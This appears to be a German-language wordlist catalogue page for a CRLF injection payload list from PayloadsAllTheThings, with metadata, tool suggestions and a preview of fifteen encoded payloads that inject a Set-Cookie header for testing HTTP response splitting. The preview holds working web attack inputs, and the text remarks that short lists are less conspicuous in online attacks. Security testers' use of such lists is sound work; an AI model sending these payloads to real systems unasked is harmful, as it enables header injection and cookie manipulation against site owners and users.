CRLF Injection (PayloadsAllTheThings)
CRLF-Injection-Payloads, die verschiedene Kodierungen von Carriage-Return/Line-Feed verwenden, um einen Set-Cookie-Header zu injizieren. Zum Testen von HTTP-Response-Splitting und Header-Injection.
- Größe
- 588 B
- Kategorie
- Fuzzing
- Quelle
- swisskyrepo/PayloadsAllTheThings
- Lizenz
- MIT
- Empfohlene Tools
- wfuzzburpffuf
Vorschau
Die ersten 15 Einträge. Lade die vollständige Liste (588 B) herunter oder kopiere sie über die Schaltflächen oben.
/%%0a0aSet-Cookie:crlf=injection /%0aSet-Cookie:crlf=injection /%0d%0aSet-Cookie:crlf=injection /%0dSet-Cookie:crlf=injection /%23%0aSet-Cookie:crlf=injection /%23%0d%0aSet-Cookie:crlf=injection /%23%0dSet-Cookie:crlf=injection /%25%30%61Set-Cookie:crlf=injection /%25%30aSet-Cookie:crlf=injection /%250aSet-Cookie:crlf=injection /%25250aSet-Cookie:crlf=injection /%2e%2e%2f%0d%0aSet-Cookie:crlf=injection /%2f%2e%2e%0d%0aSet-Cookie:crlf=injection /%2F..%0d%0aSet-Cookie:crlf=injection /%3f%0d%0aSet-Cookie:crlf=injection
CRLF-Injection-Payloads, die verschiedene Kodierungen von Carriage-Return/Line-Feed verwenden, um einen Set-Cookie-Header zu injizieren. Zum Testen von HTTP-Response-Splitting und Header-Injection.
Diese Liste ist auf Eingabe-Fuzzing und Schwachstellenfindung ausgerichtet. Sie umfasst rund 588 B und harmoniert gut mit Tools wie wfuzz, burp, ffuf. Wähle die kleinste Liste, die zu deinem Auftrag passt: Kürzere Listen sind schneller und unauffälliger bei Online- Angriffen, während größere Listen eine breitere Abdeckung für Offline-Arbeit bieten, bei der Geschwindigkeit weniger eine Einschränkung darstellt.
Du kannst die Beispielvorschau direkt von dieser Seite kopieren, die gesamte Liste in
deine Zwischenablage kopieren oder die rohe .txt-Datei herunterladen. Die vollständige Liste wird direkt
von ihrer Ursprungsquelle auf GitHub bereitgestellt.
Bezogen von swisskyrepo/PayloadsAllTheThings und unter MIT verteilt. Verwende Wordlists nur gegen Systeme, für deren Test du ausdrücklich autorisiert bist.